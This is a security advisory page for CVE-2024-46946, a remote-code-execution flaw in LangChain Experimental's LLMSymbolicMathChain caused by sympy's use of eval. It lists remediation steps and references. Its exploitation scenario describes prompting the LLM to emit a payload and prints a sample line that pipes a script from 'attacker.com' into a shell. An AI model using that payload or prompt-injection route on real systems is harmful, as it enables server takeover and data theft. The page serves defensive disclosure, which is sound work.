CVE-2024-46946: LangChain-Experimental: RCE via eval in math chain
CRITICAL PoC AVAILABLE CISA: ATTENDAny application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.
Risk Assessment
Severity is maximum: network-accessible, no authentication, no user interaction, public PoC available on GitHub. The vulnerability is trivial to exploit — sympy.sympify() internally calls eval() on user-influenced strings, meaning any attacker who can reach the endpoint can run arbitrary OS commands with the process's privileges. Exposure is broad because LangChain Experimental is widely adopted in AI agent prototypes and internal tools, many of which lack perimeter controls.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| langchain-experimental | pip | — | No patch |
Do you use langchain-experimental? You're affected.
Severity & Risk
Attack Surface
Recommended Action
6 steps-
PATCH
Upgrade langchain-experimental to a version above 0.3.0 immediately.
-
AUDIT
Inventory all applications importing LLMSymbolicMathChain — grep codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'.
-
DISABLE
If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations.
-
ISOLATE
Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, drop capabilities).
-
DETECT
Alert on unexpected subprocess spawns, outbound connections, or file system writes from LangChain process PIDs.
-
VERIFY
Confirm remediation by checking installed package version: pip show langchain-experimental.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-46946?
Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.
Is CVE-2024-46946 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-46946, increasing the risk of exploitation.
How to fix CVE-2024-46946?
1. PATCH: Upgrade langchain-experimental to a version above 0.3.0 immediately. 2. AUDIT: Inventory all applications importing LLMSymbolicMathChain — grep codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'. 3. DISABLE: If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations. 4. ISOLATE: Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, drop capabilities). 5. DETECT: Alert on unexpected subprocess spawns, outbound connections, or file system writes from LangChain process PIDs. 6. VERIFY: Confirm remediation by checking installed package version: pip show langchain-experimental.
What systems are affected by CVE-2024-46946?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LangChain pipelines, math reasoning chains, LLM-powered API backends, internal AI tooling.
What is the CVSS score for CVE-2024-46946?
CVE-2024-46946 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.66%.
Technical Details
NVD Description
langchain_experimental (aka LangChain Experimental) 0.1.17 through 0.3.0 for LangChain allows attackers to execute arbitrary code through sympy.sympify (which uses eval) in LLMSymbolicMathChain. LLMSymbolicMathChain was introduced in fcccde406dd9e9b05fc9babcbeb9ff527b0ec0c6 (2023-10-05).
Exploitation Scenario
An attacker targets a public-facing AI chatbot or internal math-reasoning API built with LangChain. They craft a prompt that causes the LLM to output a valid-looking but malicious sympy expression such as '__import__("os").system("curl attacker.com/shell.sh|sh")'. LLMSymbolicMathChain passes this string to sympy.sympify(), which internally calls eval(), executing the payload with the server process's privileges. No credentials or special knowledge required — the public PoC confirms this is script-kiddie territory. A successful exploit yields full server compromise, data exfiltration, or lateral movement into the AI infrastructure.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References
- cwe.mitre.org/data/definitions/95.html Not Applicable
- docs.sympy.org/latest/modules/codegen.html Technical
- gist.github.com/12end/68c0c58d2564ef4141bccd4651480820 Exploit 3rd Party
- github.com/langchain-ai/langchain/releases/tag/langchain-experimental%3D%3D0.3.0 Release
- github.com/fkie-cad/nvd-json-data-feeds Exploit
Timeline
Related Vulnerabilities
CVE-2025-2828 10.0 LangChain RequestsToolkit: SSRF exposes cloud metadata
Same package: langchain CVE-2023-34541 9.8 LangChain: RCE via unsafe load_prompt deserialization
Same package: langchain CVE-2023-29374 9.8 LangChain: RCE via prompt injection in LLMMathChain
Same package: langchain CVE-2023-34540 9.8 LangChain: RCE via JiraAPIWrapper crafted input
Same package: langchain CVE-2023-36258 9.8 LangChain: unauthenticated RCE via code injection
Same package: langchain
AI Threat Alert